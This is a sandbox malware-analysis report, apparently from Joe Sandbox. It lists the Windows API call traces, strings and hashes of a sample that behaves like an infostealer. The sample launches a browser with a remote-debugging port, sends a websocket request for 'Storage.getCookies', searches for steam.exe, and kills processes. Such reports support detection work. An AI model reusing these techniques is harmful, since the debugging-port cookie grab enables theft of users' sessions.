                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 362bbe9c99f68e2ead534138b7790275c52f292d023646d8b3d374886afa8025
                            • Instruction ID: d6f6610ba00f9aa0e9d32f94dbdfc5a2cd6f6729146c7fbd3307e13be6ca1ea0
                            • Opcode Fuzzy Hash: 362bbe9c99f68e2ead534138b7790275c52f292d023646d8b3d374886afa8025
                            • Instruction Fuzzy Hash: 9A126271A117069BCB25EF7CD899AAE7BF8EF44300F4449A8F946D7290DB34DC458BA0
                            APIs
                            • wsprintfA.USER32 ref: 00B1CBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1CC13
                            • lstrcat.KERNEL32(?,?), ref: 00B1CC5F
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1CC71
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1CC8B
                            • wsprintfA.USER32 ref: 00B1CCB0
                            • PathMatchSpecA.SHLWAPI(?,01878C68), ref: 00B1CCE2
                            • CoInitialize.OLE32(00000000), ref: 00B1CCEE
                              • Part of subcall function 00B1CAE0: CoCreateInstance.COMBASE(00B2B110,00000000,00000001,00B2B100,?), ref: 00B1CB06
                              • Part of subcall function 00B1CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00B1CB46
                              • Part of subcall function 00B1CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00B1CBC9
                            • CoUninitialize.COMBASE ref: 00B1CD09
                            • lstrcat.KERNEL32(?,?), ref: 00B1CD2E
                            • lstrlen.KERNEL32(?), ref: 00B1CD3B
                            • StrCmpCA.SHLWAPI(?,00B2CFEC), ref: 00B1CD55
                            • wsprintfA.USER32 ref: 00B1CD7D
                            • wsprintfA.USER32 ref: 00B1CD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00B1CDB0
                            • wsprintfA.USER32 ref: 00B1CDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B1CDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B1CE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00B1CE28
                            • CloseHandle.KERNEL32(00000000), ref: 00B1CE33
                            • CloseHandle.KERNEL32(00000000), ref: 00B1CE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1CE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1CE94
                            • FindNextFileA.KERNEL32(?,?), ref: 00B1CF8D
                            • FindClose.KERNEL32(?), ref: 00B1CF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 2af4fe12189f222a9a41a3ed0573691f23b9dc96002b3763fdaaa6717c523761
                            • Instruction ID: 517d1b248dc574f4f4ec7e7b7426db1a654859891555a342c6b9dd38410fe0e4
                            • Opcode Fuzzy Hash: 2af4fe12189f222a9a41a3ed0573691f23b9dc96002b3763fdaaa6717c523761
                            • Instruction Fuzzy Hash: 10C14072A003199FDB64DF64DC49AEE7BB9EF44300F5445A8F509E7290DB70AA85CFA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B11291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B112BF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B112CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112E7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B112F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B1133A
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1135C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B11376
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B113AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B113D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B113E2
                            • lstrlen.KERNEL32(00B31794), ref: 00B113ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1140A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11416
                            • lstrlen.KERNEL32(?), ref: 00B11423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11443
                            • lstrcat.KERNEL32(00000000,?), ref: 00B11451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1147A
                            • StrCmpCA.SHLWAPI(?,0187D418), ref: 00B114A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B114E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11535
                            • StrCmpCA.SHLWAPI(?,0187DB70), ref: 00B11552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B115BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B115E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B117BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B117F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1181C
                            • FindClose.KERNEL32(00000000), ref: 00B1182B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 62b2b6e74e37d82d9e5a0e27db963a2be808cdd0fbeef1d3fe3f4fceb26f007e
                            • Instruction ID: 3bc89a945502f5cec762e8aa7a5505dc2338d1859704aa4a35a43f6c0d058aab
                            • Opcode Fuzzy Hash: 62b2b6e74e37d82d9e5a0e27db963a2be808cdd0fbeef1d3fe3f4fceb26f007e
                            • Instruction Fuzzy Hash: 4BC16F71A117069BCB21EF78D889AAE7BF8EF44700F4444A8B945E7291DB34DD498BA0
                            APIs
                            • memset.MSVCRT ref: 00B09790
                            • lstrcat.KERNEL32(?,?), ref: 00B097A0
                            • lstrcat.KERNEL32(?,?), ref: 00B097B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00B097C3
                            • memset.MSVCRT ref: 00B097D7
                              • Part of subcall function 00B23E70: lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B23EA5
                              • Part of subcall function 00B23E70: lstrcpy.KERNEL32(00000000,0187E278), ref: 00B23ECF
                              • Part of subcall function 00B23E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00B0134E,?,0000001A), ref: 00B23ED9
                            • wsprintfA.USER32 ref: 00B09806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00B09827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00B09844
                              • Part of subcall function 00B246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00B246B9
                              • Part of subcall function 00B246A0: Process32First.KERNEL32(00000000,00000128), ref: 00B246C9
                              • Part of subcall function 00B246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00B246DB
                              • Part of subcall function 00B246A0: StrCmpCA.SHLWAPI(?,?), ref: 00B246ED
                              • Part of subcall function 00B246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B24702
                              • Part of subcall function 00B246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00B24711
                              • Part of subcall function 00B246A0: CloseHandle.KERNEL32(00000000), ref: 00B24718
                              • Part of subcall function 00B246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00B24726
                              • Part of subcall function 00B246A0: CloseHandle.KERNEL32(00000000), ref: 00B24731
                            • lstrcat.KERNEL32(00000000,?), ref: 00B09878
                            • lstrcat.KERNEL32(00000000,?), ref: 00B09889
                            • lstrcat.KERNEL32(00000000,00B34B60), ref: 00B0989B
                            • memset.MSVCRT ref: 00B098AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B098D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B09903
                            • StrStrA.SHLWAPI(00000000,0187EF30), ref: 00B09919
                            • lstrcpyn.KERNEL32(00D393D0,00000000,00000000), ref: 00B09938
                            • lstrlen.KERNEL32(?), ref: 00B0994B
                            • wsprintfA.USER32 ref: 00B0995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00B09971
                            • Sleep.KERNEL32(00001388), ref: 00B099E7
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B092E1
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B092FA
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B09399
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B093E6
                              • Part of subcall function 00B24740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00B24759
                              • Part of subcall function 00B24740: Process32First.KERNEL32(00000000,00000128), ref: 00B24769
                              • Part of subcall function 00B24740: Process32Next.KERNEL32(00000000,00000128), ref: 00B2477B
                              • Part of subcall function 00B24740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2479C
                              • Part of subcall function 00B24740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00B247AB
                              • Part of subcall function 00B24740: CloseHandle.KERNEL32(00000000), ref: 00B247B2
                              • Part of subcall function 00B24740: Process32Next.KERNEL32(00000000,00000128), ref: 00B247C0
                              • Part of subcall function 00B24740: CloseHandle.KERNEL32(00000000), ref: 00B247CB
                            • CloseDesktop.USER32(?), ref: 00B09A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: b49d4038cef6e0acb5a069fdeeadf8c236bbd07ce1e6afaa1f48eb95f202857d
                            • Instruction ID: 4d1b191370a637b3a01c2e52819429dde9a4b008c51679a6b11361a7f4b3c02a
                            • Opcode Fuzzy Hash: b49d4038cef6e0acb5a069fdeeadf8c236bbd07ce1e6afaa1f48eb95f202857d
                            • Instruction Fuzzy Hash: 6C914471A50318ABDB14DF74DC49FDEB7B8AF48700F104595F609E7291DF71AA488BA0
                            APIs
                            • wsprintfA.USER32 ref: 00B1E22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1E243
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1E263
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1E27D
                            • wsprintfA.USER32 ref: 00B1E2A2
                            • StrCmpCA.SHLWAPI(?,00B2CFEC), ref: 00B1E2B4
                            • wsprintfA.USER32 ref: 00B1E2D1
                              • Part of subcall function 00B1EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00B1EE12
                            • wsprintfA.USER32 ref: 00B1E2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00B1E304
                            • lstrcat.KERNEL32(?,0187F208), ref: 00B1E335
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1E347
                            • lstrcat.KERNEL32(?,?), ref: 00B1E358
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1E36A
                            • lstrcat.KERNEL32(?,?), ref: 00B1E37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B1E394
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E422
                            • DeleteFileA.KERNEL32(?), ref: 00B1E45C
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1E49B
                            • FindClose.KERNEL32(00000000), ref: 00B1E4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: f91376454ee9fabb905e9a82b8a4e39010884ac18b3e0f712c7017eae7a00f31
                            • Instruction ID: 6302f39e506b084fcdc55c8fc9074526ebeed5dc1c2e7dff5efbcabd4a7c0f83
                            • Opcode Fuzzy Hash: f91376454ee9fabb905e9a82b8a4e39010884ac18b3e0f712c7017eae7a00f31
                            • Instruction Fuzzy Hash: B38150719003189BCB24EF64DC49AEE77B9BF44300F4449E8B91AD7291DB74EA49CFA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B016E2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0176C
                            • lstrcat.KERNEL32(00000000), ref: 00B01776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B017A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B018F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B018FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 21e2702ed00243ec2f8ad362730f39f411ef5290eb7146a61dd7f16fc692e1b1
                            • Instruction ID: e1cb36a50d27fe152afca2adb100d60a9b707f7e3441458f7d0073e879001869
                            • Opcode Fuzzy Hash: 21e2702ed00243ec2f8ad362730f39f411ef5290eb7146a61dd7f16fc692e1b1
                            • Instruction Fuzzy Hash: A4815271A116169BCB26EF6CD999AAEBFF4EF44300F0445A4F805E7291DB30DD09CBA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B1DD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B1DD4C
                            • wsprintfA.USER32 ref: 00B1DD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1DD79
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1DD9C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1DDB6
                            • wsprintfA.USER32 ref: 00B1DDD4
                            • DeleteFileA.KERNEL32(?), ref: 00B1DE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B1DDED
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                              • Part of subcall function 00B1D980: memset.MSVCRT ref: 00B1D9A1
                              • Part of subcall function 00B1D980: memset.MSVCRT ref: 00B1D9B3
                              • Part of subcall function 00B1D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1D9DB
                              • Part of subcall function 00B1D980: lstrcpy.KERNEL32(00000000,?), ref: 00B1DA0E
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,00000000), ref: 00B1DA1C
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,0187EE88), ref: 00B1DA36
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,?), ref: 00B1DA4A
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,0187D178), ref: 00B1DA5E
                              • Part of subcall function 00B1D980: lstrcpy.KERNEL32(00000000,?), ref: 00B1DA8E
                              • Part of subcall function 00B1D980: GetFileAttributesA.KERNEL32(00000000), ref: 00B1DA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1DE2E
                            • FindClose.KERNEL32(00000000), ref: 00B1DE3D
                            • lstrcat.KERNEL32(?,0187F208), ref: 00B1DE66
                            • lstrcat.KERNEL32(?,0187DC50), ref: 00B1DE7A
                            • lstrlen.KERNEL32(?), ref: 00B1DE84
                            • lstrlen.KERNEL32(?), ref: 00B1DE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1DED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: c76a59daba55deea26abee5b3a061d185f62c4238cf8dc3daaccadcf665634ec
                            • Instruction ID: 894397d80c98ca406ce116b2cb1a7a12aeb9359b2d2308ee72a92e80b615d86b
                            • Opcode Fuzzy Hash: c76a59daba55deea26abee5b3a061d185f62c4238cf8dc3daaccadcf665634ec
                            • Instruction Fuzzy Hash: 97613172A10318ABCB14EF74DC89ADE77B9BF48301F4445A4B545D7291DF34AA49CF60
                            APIs
                            • wsprintfA.USER32 ref: 00B1D54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1D564
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1D584
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1D59E
                            • lstrcat.KERNEL32(?,0187F208), ref: 00B1D5E3
                            • lstrcat.KERNEL32(?,0187F2B8), ref: 00B1D5F7
                            • lstrcat.KERNEL32(?,?), ref: 00B1D60B
                            • lstrcat.KERNEL32(?,?), ref: 00B1D61C
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1D62E
                            • lstrcat.KERNEL32(?,?), ref: 00B1D642
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1D682
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1D6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1D737
                            • FindClose.KERNEL32(00000000), ref: 00B1D746
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 74aff4e8caaab226bca8c2f88ae61749c0d19a399187a5d2c3083d1c390f6f85
                            • Instruction ID: 2dbc12b69e8b031abb7919c7a9bc1dfa4e9337016b150b6af8790aa6d9dd990d
                            • Opcode Fuzzy Hash: 74aff4e8caaab226bca8c2f88ae61749c0d19a399187a5d2c3083d1c390f6f85
                            • Instruction Fuzzy Hash: 406142719102199BCB24EF74DC88ADEBBF8EF48300F4045E5E549D7291DB34AA49CFA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B123D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B123F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B12402
                            • lstrlen.KERNEL32(\*.*), ref: 00B1240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B12436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B12486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %6u{$0=w$35w]$9;?$=;?$@*0$Qp{~$`f,@$cxf~$ql?
                            • API String ID: 0-1274174781
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00B246B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B246C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B246DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 00B246ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B24702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B24711
                            • CloseHandle.KERNEL32(00000000), ref: 00B24718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B24726
                            • CloseHandle.KERNEL32(00000000), ref: 00B24731
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: C;=$'mW$*<w$43}$7%$Ac?$To9/$v!];$1om
                            • API String ID: 0-2360086392
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #_$,Jzz$>|%$@t~$].xo$].xo$m][~$hi$;x
                            • API String ID: 0-2755435236
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00B24628
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B24638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B2464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00B24660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B24672
                            • CloseHandle.KERNEL32(00000000), ref: 00B2467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14B7F
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B14B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BA7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B14BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B14BFA
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            APIs
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B22D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B22DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B22DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B22DEC
                            • LocalFree.KERNEL32(00000000), ref: 00B22FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 1+dq$1{$:o$FsY$ZSU$\dl:$n|l}
                            • API String ID: 0-1456053596
                            • Opcode ID: fc70a3be453153a6b637535e6e7d73e842cabe6f097791fba38013de07eca28b
                            • Instruction ID: 988bf4d8481d146707643d81a37fed3c024907c94b8481fe411a3ef5f3894e65
                            • Opcode Fuzzy Hash: fc70a3be453153a6b637535e6e7d73e842cabe6f097791fba38013de07eca28b
                            • Instruction Fuzzy Hash: 8BB228F360C2049FE3086E2DEC8567AFBE9EF94320F1A493DEAC5C7744E63558418696
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
